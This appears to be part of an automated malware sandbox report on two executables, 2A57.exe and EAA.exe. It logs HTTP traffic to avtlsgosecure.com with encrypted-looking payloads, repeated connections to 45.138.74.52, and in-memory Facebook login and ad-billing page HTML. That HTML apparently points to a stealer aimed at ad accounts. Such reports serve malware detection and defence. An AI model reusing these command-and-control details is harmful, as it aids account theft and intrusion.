Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 55Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fc 94 af bb a4 0f 42 bd de 2c fc e8 1c 36 90 fd 85 fc 20 b3 82 95 ae 7e ef 4c 8c a8 47 2e 8d 3d 54 96 4e Data Ascii: %S`Nh&WQY^B,6 ~LG.=TN
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 73Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3 Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:13 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 fe 20 b3 85 83 ac 23 a4 5b 9b Data Ascii: %S`Nh&WQY^["S9 #[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 42Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 a3 6f bb 98 95 Data Ascii: %S`Nh&WQY^["S9o
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 57Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 1d e2 81 b9 e5 bf 54 5d b3 c5 39 f9 b4 0d 33 92 f9 c9 f2 06 bb 82 88 b2 59 8b 0c b3 bf 04 7d c6 25 05 c0 4e 7e b5 Data Ascii: %S`Nh&WQLT]93Y}%N~
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.52
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: (Ycontent-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input t equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="3nHgiaRw">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tBkKtFtO">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: EAA.exe, 0000000C.00000002.647023897.0000000002432000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647141442.0000000002434000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comX equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com] equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.come= equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.566047879.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2KDX0_xm5tHV6EtlZy1FVE0SRsncVSt4wGO4MCE2w-J6mfa5CkrpsucEDN45BdGpUG6pvEEJ0XcbRs-p9DYP6KN7DqzC6p9a4h2C8Vro8p34ncbvS8ojItgeHFEqHcfX2tkK0p_WNDBF-YGO4Xwg" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy 